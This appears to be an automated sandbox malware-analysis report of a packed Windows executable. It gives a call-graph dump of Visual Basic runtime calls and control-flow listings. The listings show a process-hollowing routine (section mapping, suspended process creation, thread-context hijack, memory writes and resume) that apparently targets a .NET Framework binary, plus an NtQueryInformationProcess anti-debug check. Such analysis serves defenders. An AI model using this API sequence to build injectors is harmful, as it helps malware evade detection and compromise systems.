2659->2660 2661 4fa584 __vbaAryUnlock __vbaFreeStr #644 2659->2661 2660->2661 2664 4fa5b4 2661->2664 2662 4fa61b #644 2925 4a78e3 2662->2925 2663 4fa5ca __vbaAryLock #644 __vbaAryUnlock 2663->2664 2664->2662 2664->2663 2666 4fa645 #644 2926 4a78e3 2666->2926 2668 4fa66f #644 2927 4a78e3 2668->2927 2670 4fa699 #644 2928 4a78e3 2670->2928 2672 4fa6c3 #644 2929 4a78e3 2672->2929 2674 4fa6ed VirtualProtect 2675 4fa747 2674->2675 2676 4fa732 __vbaHresultCheckObj 2674->2676 2677 4fa75c __vbaAryLock #644 __vbaAryUnlock 2675->2677 2678 4fa7a5 #644 2675->2678 2676->2675 2677->2675 2930 4a78c6 2678->2930 2680 4fa7c2 #644 2931 4a78c6 2680->2931 2682 4fa7d9 #644 2683 4fa7f6 2682->2683 2932 4faa72 2683->2932 2685 4fa7ff __vbaFreeVar 2686 4fa871 __vbaAryDestruct 2685->2686 2686->2537 2943 40bb58 2687->2943 2689 4ff283 __vbaSetSystemError 2690 4ff298 __vbaFreeVar 2689->2690 2691 4faf77 2690->2691 3071 4fb04a 2691->3071 2693 4fafb4 #644 2694 4fafc6 2693->2694 2695 4fafcd __vbaRedim __vbaAryLock #644 __vbaAryUnlock 2694->2695 2696 4fb01f 2694->2696 2695->2696 2696->2541 3072 4ff016 2697->3072 2700 4fef8a #644 3077 4a78c6 2700->3077 2701 4feff1 2701->2546 2703 4fefa2 #644 3078 4a78c6 2703->3078 2705 4fefba #644 3079 4a78c6 2705->3079 2707 4fefd3 #644 #644 2707->2701 2709 4a629a 2708->2709 2709->2548 2711 4fb5c6 2710->2711 2712 4fb5df 2711->2712 2713 4fb5cc __vbaHresultCheckObj 2711->2713 2714 4fbded 6 API calls 2712->2714 2715 4fb5f0 __vbaObjSetAddref 2712->2715 2713->2712 2714->2551 3080 4fd499 __vbaObjSetAddref __vbaVarMove 2715->3080 2718 4fb606 7 API calls 2719 4fd499 15 API calls 2718->2719 2720 4fb65d 6 API calls 2719->2720 2721 4fb6bc 2720->2721 2722 4fb6ce 2721->2722 2723 4fb6c2 __vbaHresultCheckObj 2721->2723 2724 4fb6fe 2722->2724 2725 4fb6f2 __vbaHresultCheckObj 2722->2725 2723->2722 2726 4fb717 __vbaHresultCheckObj 2724->2726 2727 4fb723 __vbaObjSetAddref 2724->2727 2725->2724 2726->2727 3092 4fd301 __vbaObjSetAddref 2727->3092 2729 4fb735 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 2730 4fd301 9 API calls 2729->2730 2731 4fb76b __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 2730->2731 2732 4fd301 9 API calls 2731->2732 2733 4fb7a1 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 2732->2733 2734 4fb7d8 2733->2734 2735 4fb7de __vbaHresultCheckObj 2734->2735 2736 4fb7ea 2734->2736 2735->2736 2737 4fb80f 2736->2737 2738 4fb803 __vbaHresultCheckObj 2736->2738 2739 4fb82e __vbaHresultCheckObj 2737->2739 2740 4fb83a 2737->2740 2738->2737 2739->2740 2741 4fb85f __vbaRedim __vbaAryLock 2740->2741 2742 4fb853 __vbaHresultCheckObj 2740->2742 2743 4fb8a5 2741->2743 2742->2741 2744 4fb8ab __vbaHresultCheckObj 2743->2744 2745 4fb8b7 __vbaAryUnlock 2743->2745 2744->2745 2746 4fb8cb 2745->2746 2747 4fb8ea 2745->2747 3114 4fc18f __vbaVarVargNofree __vbaStrVarCopy __vbaStrMove 2746->3114 2747->2714 2748 4fb907 2747->2748 3101 4fbef5 2747->3101 2748->2714 2751 4fb929 __vbaHresultCheckObj 2748->2751 2752 4fb935 2748->2752 2751->2752 2753 4fba3b __vbaAryLock #644 __vbaAryUnlock 2752->2753 2754 4fb94b __vbaRedim __vbaAryLock 2752->2754 2755 4fba6a 2753->2755 2756 4fb987 2754->2756 2757 4fef43 9 API calls 2755->2757 2759 4fb98d __vbaHresultCheckObj 2756->2759 2760 4fb999 __vbaAryUnlock 2756->2760 2758 4fba80 __vbaObjSet 2757->2758 2763 4fba96 __vbaRedim 2758->2763 2787 4fbab0 2758->2787 2759->2760 2761 4fb9ad 2760->2761 2762 4fb9cc 2760->2762 2764 4fc18f 36 API calls 2761->2764 2762->2714 2765 4fb9ec __vbaAryLock #644 __vbaAryUnlock 2762->2765 2767 4fbef5 175 API calls 2762->2767 2763->2787 2764->2762 2768 4fba1b 2765->2768 2766 4fbac9 __vbaAryLock 2766->2787 2769 4fb9e3 2767->2769 2770 4fef43 9 API calls 2768->2770 2769->2714 2769->2765 2771 4fba31 __vbaObjSet 2770->2771 2771->2753 2772 4fbb1e 8 API calls 2772->2787 2773 4fbb12 __vbaHresultCheckObj 2773->2772 2774 4fbd6b __vbaHresultCheckObj 2774->2787 2775 4fbd7d __vbaRedim __vbaAryLock 2775->2787 2776 4fbdd7 __vbaAryUnlock 2776->2787 2777 4fbb98 __vbaHresultCheckObj 2777->2787 2778 4fbdce __vbaAryUnlock 2778->2776 2779 4fbdc8 __vbaHresultCheckObj 2779->2778 2780 4fbbbd __vbaHresultCheckObj 2781 4fbbc9 7 API calls 2780->2781 2781->2787 2782 4fbc2f __vbaHresultCheckObj 2782->2787 2783 4fbc54 __vbaHresultCheckObj 2784 4fbc60 7 API calls 2783->2784 2784->2787 2785 4fbcc6 __vbaHresultCheckObj 2785->2787 2786 4fbceb __vbaHresultCheckObj 2786->2787 2787->2714 2787->2766 2787->2772 2787->2773 2787->2774 2787->2775 2787->2776 2787->2777 2787->2778 2787->2779 2787->2780 2787->2781 2787->2782 2787->2783 2787->2784 2787->2785 2787->2786 2788 4fbd01 __vbaRedim __vbaAryLock 2787->2788 2788->2787 2790 4ff4ef __vbaFreeVar 2789->2790 2790->2553 2792 4fc614 2791->2792 2793 4fc65f __vbaVarDup #633 #635 __vbaFreeVarList 2792->2793 2794 4fc618 __vbaVarLateMemCallLd __vbaVarMove __vbaNextEachVar 2792->2794 2795 4fc6de __vbaAryUnlock __vbaFreeObj __vbaFreeVarList __vbaFreeVar __vbaFreeVar 2793->2795 2794->2792 2795->2564 3165 40b7b0 2796->3165 2798 4fb37d __vbaSetSystemError 2799 40b6e0 147 API calls 2798->2799 2800 4fb391 __vbaSetSystemError 2799->2800 2801 40b7b0 147 API calls 2800->2801 2802 4fb39b __vbaSetSystemError 2801->2802 2802->2572 3170 40bc24 2803->3170 2805 4fc824 __vbaSetSystemError __vbaFreeStrList 2806 4fc85d 2805->2806 2807 4fc861 12 API calls 2805->2807 2806->2807 2808 40bc24 147 API calls 2807->2808 2809 4fc8de __vbaSetSystemError __vbaFreeStrList 2808->2809 2810 4fc917 12 API calls 2809->2810 2811 4fc913 2809->2811 2812 40bc24 147 API calls 2810->2812 2811->2810 2813 4fc994 __vbaSetSystemError __vbaFreeStrList 2812->2813 2814 4fc9cd 6 API calls 2813->2814 2815 4fc9c9 2813->2815 2816 40bc24 147 API calls 2814->2816 2815->2814 2817 4fca13 __vbaSetSystemError __vbaFreeStrList 2816->2817 2818 4fca3c 2817->2818 2819 4fca40 14 API calls 2817->2819 2818->2819 2820 40bc24 147 API calls 2819->2820 2821 4fcad2 __vbaSetSystemError __vbaFreeStrList 2820->2821 2822 4fcb0f 32 API calls 2821->2822 2823 4fcb0b 2821->2823 2824 40bc24 147 API calls 2822->2824 2823->2822 2825 4fcc60 __vbaSetSystemError __vbaFreeStrList 2824->2825 2826 4fccbd 2825->2826 2827 4fccc1 22 API calls 2825->2827 2826->2827 2828 40bc24 147 API calls 2827->2828 2829 4fcdac __vbaSetSystemError __vbaFreeStrList 2828->2829 2830 4fcdf9 16 API calls 2829->2830 2831 4fcdf5 2829->2831 2832 40bc24 147 API calls 2830->2832 2831->2830 2833 4fcea5 __vbaSetSystemError __vbaFreeStrList 2832->2833 2834 4fcee6 12 API calls 2833->2834 2835 4fcee2 2833->2835 2836 40bc24 147 API calls 2834->2836 2835->2834 2837 4fcf64 __vbaSetSystemError __vbaFreeStrList 2836->2837 2838 4fcf9d __vbaStrCat __vbaStrMove #644 #644 2837->2838 2839 4fcf99 2837->2839 2840 40bc24 147 API calls 2838->2840 2839->2838 2841 4fcfcf __vbaSetSystemError __vbaFreeStr 2840->2841 2842 4fcfee 2841->2842 2843 4fcff2 26 API calls 2841->2843 2842->2843 2844 40bc24 147 API calls 2843->2844 2845 4fd0f3 __vbaSetSystemError __vbaFreeStrList 2844->2845 2846 4fd148 26 API calls 2845->2846 2847 4fd144 2845->2847 2848 40bc24 147 API calls 2846->2848 2847->2846 2849 4fd24a __vbaSetSystemError __vbaFreeStrList 2848->2849 2850 4fd29b 2849->2850 2850->2581 2850->2601 2852 40b6e9 2851->2852 2854 4fa88c 147 API calls 2852->2854 2853 40b6f7 2855 4fa88c 147 API calls 2853->2855 2854->2853 2855->2853 2857 4fb3ba 2856->2857 2858 4fb3bf 2856->2858 3175 4a74f4 GetPEB 2857->3175 2860 4fb3d6 2858->2860 3176 4a74f4 GetPEB 2858->3176 2864 4fb3f2 2860->2864 3177 4a74e0 GetPEB 2860->3177 2865 4fb40e 2864->2865 3178 4a746e GetPEB 2864->3178 2865->2556 2865->2565 2867 40b569 2866->2867 3180 4fac80 __vbaRedim 2868->3180 3184 40bbd8 2878->3184 3186 40bb98 2881->3186 2886 4ffb2a 4 API calls 2885->2886 2887 4fb4ad 2886->2887 2888 4ffb2a 4 API calls 2887->2888 2889 4fb4c2 2888->2889 2890 4fb4cc __vbaSetSystemError 2889->2890 2891 4fb4ec __vbaStrCopy 2890->2891 2892 4fb4d7 #616 __vbaStrMove 2890->2892 2893 4fb4f9 __vbaStrCopy 2891->2893 2892->2893 2894 4fb522 __vbaFreeStr __vbaFreeStr 2893->2894 2894->2614 3188 40b770 2895->3188 2913->2616 2915 4fa054 GetModuleHandleW __vbaFreeStrList __vbaFreeVar 2914->2915 2916 4fdb76 __vbaVarDup __vbaLenVar __vbaI4Var 2915->2916 2917 4fdbdf 2916->2917 2918 4fdc4a __vbaFreeVar 2917->2918 2919 4fdbe7 6 API calls 2917->2919 2918->2648 2919->2917 2921->2653 2922->2655 2923->2657 2924->2659 2925->2666 2926->2668 2927->2670 2928->2672 2929->2674 2930->2680 2931->2682 2940 4fb04a 2932->2940 2934 4faaac #644 #644 2941 4a78c6 2934->2941 2936 4faad8 #644 2942 4a78e3 2936->2942 2938 4faaf7 #644 2939 4fab18 2938->2939 2939->2685 2940->2934 2941->2936 2942->2938 2944 40bb61 2943->2944 2948 4fa88c #644 2944->2948 2945 40bb6f 2946 4fa88c 147 API calls 2945->2946 2946->2945 2970 4a78c6 2948->2970 2950 4fa8df #644 2971 4a78c6 2950->2971 2952 4fa8fd #644 2972 4fdca4 10 API calls 2952->2972 2954 4fa910 3007 4fab46 __vbaVarDup 2954->3007 2956 4fa934 __vbaStrVarMove __vbaStrMove __vbaFreeVar 2957 4fab46 10 API calls 2956->2957 2958 4fa974 __vbaStrVarMove __vbaStrMove __vbaFreeVar 2957->2958 2959 4fa995 __vbaNew2 2958->2959 2960 4fa9a3 2958->2960 2959->2960 2961 4fa9d5 __vbaHresultCheckObj 2960->2961 2962 4fa9e3 __vbaFreeVar #644 #644 2960->2962 2961->2962 3014 4fd671 13 API calls 2962->3014 2964 4faa06 #644 2965 4fdca4 55 API calls 2964->2965 2966 4faa24 2965->2966 2967 4faa72 4 API calls 2966->2967 2968 4faa2d __vbaFreeVar 2967->2968 2969 4faa45 __vbaFreeStr __vbaFreeObj __vbaFreeStr 2968->2969 2969->2945 2970->2950 2971->2952 2975 4fdd87 2972->2975 2973 4fdde8 __vbaObjSetAddref #644 __vbaFreeObj #644 3051 4a78c6 2973->3051 2974 4fdda1 __vbaAryLock #644 __vbaAryUnlock 2974->2975 2975->2973 2975->2974 2977 4fde19 __vbaAryLock #644 __vbaAryUnlock #644 3052 4a78c6 2977->3052 2979 4fde5b __vbaRedim #644 3053 4a78c6 2979->3053 2981 4fde9c #644 3054 4a78c6 2981->3054 2983 4fdebc __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 2984 4fdf2f 7 API calls 2983->2984 2985 4fdf19 __vbaHresultCheckObj 2983->2985 3055 4a78c6 2984->3055 2985->2984 2987 4fdf8f __vbaFreeStr __vbaFreeVar 2988 4fdfa7 2987->2988 2989 4fdff7 #644 2988->2989 2990 4fdfb2 __vbaAryLock #644 __vbaAryUnlock 2988->2990 3056 4a78e3 2989->3056 2990->2988 2992 4fe016 #644 3057 4a78e3 2992->3057 2994 4fe035 #644 3058 4a78e3 2994->3058 2996 4fe054 #644 3059 4a78e3 2996->3059 2998 4fe073 #644 3060 4a78e3 2998->3060 3000 4fe092 VirtualProtect 3001 4fe0cb __vbaHresultCheckObj 3000->3001 3002 4fe0e1 3000->3002 3001->3002 3003 4fe130 #644 3002->3003 3004 4fe0f0 __vbaAryLock #644 __vbaAryUnlock 3002->3004 3005 4fe143 3003->3005 3004->3002 3006 4fe176 __vbaAryDestruct __vbaAryDestruct 3005->3006 3006->2954 3008 4fab8b #644 __vbaI4Var 3007->3008 3009 4faba6 3008->3009 3010 4fac04 __vbaVarAdd __vbaVarMove 3009->3010 3011 4fabcc #698 __vbaVarCat __vbaVarMove __vbaFreeVar 3009->3011 3012 4fac32 __vbaFreeVar 3009->3012 3010->3008 3011->3009 3012->2956 3017 4fd75c 3014->3017 3015 4fd7b0 __vbaObjSetAddref #644 __vbaFreeObj #644 3061 4a78c6 3015->3061 3016 4fd770 __vbaAryLock #644 __vbaAryUnlock 3016->3017 3017->3015 3017->3016 3019 4fd7df __vbaAryLock #644 __vbaAryUnlock #644 3020 4fd823 3019->3020 3062 4f9d26 __vbaRedim 3020->3062 3022 4fd83d #644 3063 4a78c6 3022->3063 3024 4fd85a #644 3064 4a78c6 3024->3064 3026 4fd87d __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3027 4fd8e3 7 API calls 3026->3027 3028 4fd8d3 __vbaHresultCheckObj 3026->3028 3065 4a78c6 3027->3065 3028->3027 3030 4fd94a __vbaFreeStr __vbaFreeVar 3031 4fd965 3030->3031 3032 4fd9bb #644 3031->3032 3033 4fd970 __vbaAryLock #644 __vbaAryUnlock 3031->3033 3066 4a78c6 3032->3066 3033->3031 3035 4fd9db #644 3067 4a78c6 3035->3067 3037 4fd9fb #644 3068 4a78c6 3037->3068 3039 4fda1b #644 3069 4a78c6 3039->3069 3041 4fda3b #644 3070 4a78c6 3041->3070 3043 4fda57 #644 #644 3044 4fdaa2 3043->3044 3045 4fdaa8 __vbaHresultCheckObj 3044->3045 3046 4fdab8 3044->3046 3045->3046 3047 4fdacd __vbaAryLock #644 __vbaAryUnlock 3046->3047 3048 4fdb10 #644 3046->3048 3047->3046 3049 4fdb25 3048->3049 3050 4fdb4e __vbaAryDestruct __vbaFreeObj 3049->3050 3050->2964 3051->2977 3052->2979 3053->2981 3054->2983 3055->2987 3056->2992 3057->2994 3058->2996 3059->2998 3060->3000 3061->3019 3062->3022 3063->3024 3064->3026 3065->3030 3066->3035 3067->3037 3068->3039 3069->3041 3070->3043 3071->2693 3073 4ff04c __vbaRedim 3072->3073 3074 4ff06b __vbaAryLock #644 __vbaAryUnlock 3072->3074 3073->3074 3076 4fef83 3074->3076 3076->2700 3076->2701 3077->2703 3078->2705 3079->2707 3081 4fd51c 3080->3081 3082 4fd532 __vbaVarCmpGt __vbaVarOr __vbaBoolVarNull __vbaFreeVar 3081->3082 3083 4fd522 __vbaHresultCheckObj 3081->3083 3084 4fd61a __vbaFreeObj 3082->3084 3085 4fd591 __vbaRedim __vbaAryLock 3082->3085 3083->3082 3084->2718 3087 4fd5d9 3085->3087 3088 4fd5ef __vbaAryUnlock 3087->3088 3089 4fd5df __vbaHresultCheckObj 3087->3089 3154 4fd412 #717 __vbaVarMove 3088->3154 3089->3088 3093 4fd35a 3092->3093 3094 4fd370 3093->3094 3095 4fd360 __vbaHresultCheckObj 3093->3095 3096 4fd3d7 __vbaFreeObj 3094->3096 3098 4fd37e #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar #644 3094->3098 3095->3094 3096->2729 3099 4fd3c1 3098->3099 3099->3096 3100 4fd3c7 __vbaHresultCheckObj 3099->3100 3100->3096 3102 4fbf56 3101->3102 3103 4fbfd0 3101->3103 3161 4fbe71 __vbaRefVarAry __vbaUbound __vbaVarMove 3102->3161 3105 4fbfd3 __vbaAryLock #644 __vbaAryUnlock #644 3103->3105 3107 4fc008 3105->3107 3108 4fc00d __vbaRedim __vbaAryLock __vbaAryLock 3107->3108 3156 40ba64 3108->3156 3110 4fc064 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaVarMove __vbaVarTstEq 3110->3108 3111 4fc0c8 7 API calls 3110->3111 3112 4fc132 3111->3112 3113 4fc166 __vbaFreeVar __vbaAryDestruct 3112->3113 3113->2748 3115 4fc1fe 3114->3115 3116 4fc20c __vbaNew2 3115->3116 3117 4fc21a 3115->3117 3116->3117 3118 4fc23e 3117->3118 3119 4fc22d __vbaHresultCheckObj 3117->3119 3120 4fc243 __vbaStrToAnsi 3118->3120 3119->3120 3163 40b9a4 3120->3163 3155 4fd47b __vbaVarMove 3154->3155 3155->3084 3157 40ba6d 3156->3157 3159 4fa88c 147 API calls 3157->3159 3158 40ba7b 3160 4fa88c 147 API calls 3158->3160 3159->3158 3160->3158 3162 4fbed7 __vbaVarAdd __vbaVarSub __vbaI4Var __vbaFreeVarList 3161->3162 3162->3105 3164 40b9ad 3163->3164 3166 40b7b9 3165->3166 3168 4fa88c 147 API calls 3166->3168 3167 40b7c7 3169 4fa88c 147 API calls 3167->3169 3168->3167 3169->3167 3171 40bc2d 3170->3171 3173 4fa88c 147 API calls 3171->3173 3172 40bc3b 3174 4fa88c 147 API calls 3172->3174 3173->3172 3174->3172 3175->2858 3176->2860 3177->2864 3179 4a747c 3178->3179 3179->2865 3181 4facd8 __vbaFreeVar #644 3180->3181 3182 40b83c 3181->3182 3183 40b845 3182->3183 3185 40bbe1 3184->3185 3187 40bba1 3186->3187 3189 40b779 3188->3189

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 523 23530da-235310d 524 2353150-2353159 523->524 525 235310f-235314e call 23535e1 call 23536e4 523->525 527 235315f-2353175 call 23536e4 524->527 528 23535d8-23535de 524->528 525->524 527->528 533 235317b-2353268 call 2353635 * 12 527->533 533->528 558 235326e-2353271 533->558 558->528 559 2353277-235327a 558->559 559->528 560 2353280-2353283 559->560 560->528 561 2353289-235328c 560->561 561->528 562 2353292-2353295 561->562 562->528 563 235329b-235329e 562->563 563->528 564 23532a4-23532a7 563->564 564->528 565 23532ad-23532b0 564->565 565->528 566 23532b6-23532b9 565->566 566->528 567 23532bf-23532c1 566->567 567->528 568 23532c7-23532d5 567->568 569 23532d7 568->569 570 23532da-235330b NtCreateSection 568->570 569->570 570->528 571 2353311-2353333 NtMapViewOfSection 570->571 571->528 572 2353339-235336f call 23536c5 571->572 575 23533a7-23533d1 call 2353722 call 23536c5 572->575 576 2353371-2353377 572->576 587 23533d7-235344e 575->587 588 235349c-23534a8 GetPEB 575->588 577 235337c-2353380 576->577 579 2353382-2353395 call 23536c5 577->579 580 2353398-23533a5 577->580 579->580 580->575 583 2353379 580->583 583->577 591 2353450-2353460 587->591 589 23534ab-23534b2 588->589 592 23534bf-23534dc CreateProcessW 589->592 591->591 593 2353462-2353465 591->593 592->528 594 23534e2-23534fd NtGetContextThread 592->594 595 2353473-2353477 593->595 596 23535c4-23535c7 594->596 597 2353503-2353523 NtReadVirtualMemory 594->597 600 2353467-2353472 595->600 601 2353479 595->601 598 23535d0-23535d3 596->598 599 23535c9-23535ca 596->599 597->596 602 2353529-235354d NtWriteVirtualMemory 597->602 598->592 599->598 600->595 603 2353486-235348b 601->603 602->596 604 235354f-2353581 NtUnmapViewOfSection NtMapViewOfSection 602->604 605 235348d-235349a 603->605 606 235347b-2353485 603->606 607 23535c1 604->607 608 2353583-23535b2 NtSetContextThread 604->608 605->589 606->603 607->596 608->607 609 23535b4-23535bf NtResumeThread 608->609 609->528 609->607
                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 023532FF
                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235332C
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 023534D7
                  • NtGetContextThread.NTDLL(?,?), ref: 023534F6
                  • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 0235351C
                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02353546
                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02353561
                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235357A
                  • NtSetContextThread.NTDLL(?,00010003), ref: 023535AB
                  • NtResumeThread.NTDLL(?,00000000), ref: 023535B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
                  • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                  • API String ID: 1951729442-1087957892
                  • Opcode ID: 5ce2e4d1293af8f240875ee12de4f5456ad381797f57e85e4d8835d97e82181f
                  • Instruction ID: f08edaf7b82e2303f9a2ae712864f5f5f46ee6f0bf376469a97368e6c5e63b36
                  • Opcode Fuzzy Hash: 5ce2e4d1293af8f240875ee12de4f5456ad381797f57e85e4d8835d97e82181f
                  • Instruction Fuzzy Hash: EAE108B2D00269AFDF21DFA4CC84EEDBBB9BF04348F1444AAE918A7201D7349A55CF54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 610 2353113-235311e 611 2353124-2353159 call 23536e4 610->611 612 235311f call 23535e1 610->612 615 235315f-2353175 call 23536e4 611->615 616 23535d8-23535de 611->616 612->611 615->616 619 235317b-2353268 call 2353635 * 12 615->619 619->616 644 235326e-2353271 619->644 644->616 645 2353277-235327a 644->645 645->616 646 2353280-2353283 645->646 646->616 647 2353289-235328c 646->647 647->616 648 2353292-2353295 647->648 648->616 649 235329b-235329e 648->649 649->616 650 23532a4-23532a7 649->650 650->616 651 23532ad-23532b0 650->651 651->616 652 23532b6-23532b9 651->652 652->616 653 23532bf-23532c1 652->653 653->616 654 23532c7-23532d5 653->654 655 23532d7 654->655 656 23532da-235330b NtCreateSection 654->656 655->656 656->616 657 2353311-2353333 NtMapViewOfSection 656->657 657->616 658 2353339-235336f call 23536c5 657->658 661 23533a7-23533d1 call 2353722 call 23536c5 658->661 662 2353371-2353377 658->662 673 23533d7-235344e 661->673 674 235349c-23534a8 GetPEB 661->674 663 235337c-2353380 662->663 665 2353382-2353395 call 23536c5 663->665 666 2353398-23533a5 663->666 665->666 666->661 669 2353379 666->669 669->663 677 2353450-2353460 673->677 675 23534ab-23534b2 674->675 678 23534bf-23534dc CreateProcessW 675->678 677->677 679 2353462-2353465 677->679 678->616 680 23534e2-23534fd NtGetContextThread 678->680 681 2353473-2353477 679->681 682 23535c4-23535c7 680->682 683 2353503-2353523 NtReadVirtualMemory 680->683 686 2353467-2353472 681->686 687 2353479 681->687 684 23535d0-23535d3 682->684 685 23535c9-23535ca 682->685 683->682 688 2353529-235354d NtWriteVirtualMemory 683->688 684->678 685->684 686->681 689 2353486-235348b 687->689 688->682 690 235354f-2353581 NtUnmapViewOfSection NtMapViewOfSection 688->690 691 235348d-235349a 689->691 692 235347b-2353485 689->692 693 23535c1 690->693 694 2353583-23535b2 NtSetContextThread 690->694 691->675 692->689 693->682 694->693 695 23535b4-23535bf NtResumeThread 694->695 695->616 695->693
                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 023532FF
                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235332C
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 023534D7
                  • NtGetContextThread.NTDLL(?,?), ref: 023534F6
                  • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 0235351C
                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02353546
                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02353561
                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235357A
                  • NtSetContextThread.NTDLL(?,00010003), ref: 023535AB
                  • NtResumeThread.NTDLL(?,00000000), ref: 023535B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
                  • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                  • API String ID: 1951729442-1087957892
                  • Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                  • Instruction ID: 330050caef9c4bcb818cba74e3b8591f552ff90bf9d04cc354ec1296dba9b294
                  • Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                  • Instruction Fuzzy Hash: 37E1E6B2D00269AFDF21DFA4CC84EADBBB9FF04348F1444AAE918A7201D7349A55CF54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 718 4a7213-4a7292 call 4a7506 call 4a77c9 call 4a7528 call 4a776a call 4a7528 call 4a776a call 4a7528 call 4a776a 735 4a72b7-4a72db NtProtectVirtualMemory 718->735 736 4a7294-4a72b0 NtAllocateVirtualMemory 718->736 737 4a72dd 735->737 738 4a72e2-4a72e7 735->738 736->735 739 4a72b2 736->739 740 4a73da-4a73df 737->740 741 4a72ea-4a72ed 738->741 739->740 742 4a737b-4a73d4 NtProtectVirtualMemory 741->742 743 4a72f3-4a730c call 4a5e0e 741->743 742->740 746 4a730e-4a7311 743->746 747 4a7313-4a731e 743->747 746->747 748 4a7320-4a7323 746->748 749 4a7376 747->749 750 4a733b-4a733e 748->750 751 4a7325-4a7339 748->751 749->741 752 4a735c-4a735f 750->752 753 4a7340-4a7343 750->753 751->749 752->749 755 4a7361-4a7364 752->755 753->752 754 4a7345-4a735a 753->754 754->749 755->749 756 4a7366-4a7369 755->756 756->749 757 4a736b-4a7373 756->757 757->749
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess), ref: 004A72AA
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess,004A6002), ref: 004A72D5
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess,004A6002), ref: 004A73D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: MemoryVirtual$Protect$Allocate
                  • String ID: NtQueryInformationProcess
                  • API String ID: 955180148-2781105232
                  • Opcode ID: c9da44aaf622aab654dcea9c98dcb9c3ce760a812b9970c7e094a11117a3dd99
                  • Instruction ID: 6a11cfcfe4cf1c89ad85895094628fad72207878ca06714cff9e9cca33d1e0fc
                  • Opcode Fuzzy Hash: c9da44aaf622aab654dcea9c98dcb9c3ce760a812b9970c7e094a11117a3dd99
                  • Instruction Fuzzy Hash: A2513871908206EFDB20CFA5CC54BAFFBB9EBA6310F10830BE51096190D3789645DB69
                  APIs
                  • NtQueryInformationProcess.NTDLL(?,00000022,?,?,?), ref: 004A7425
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
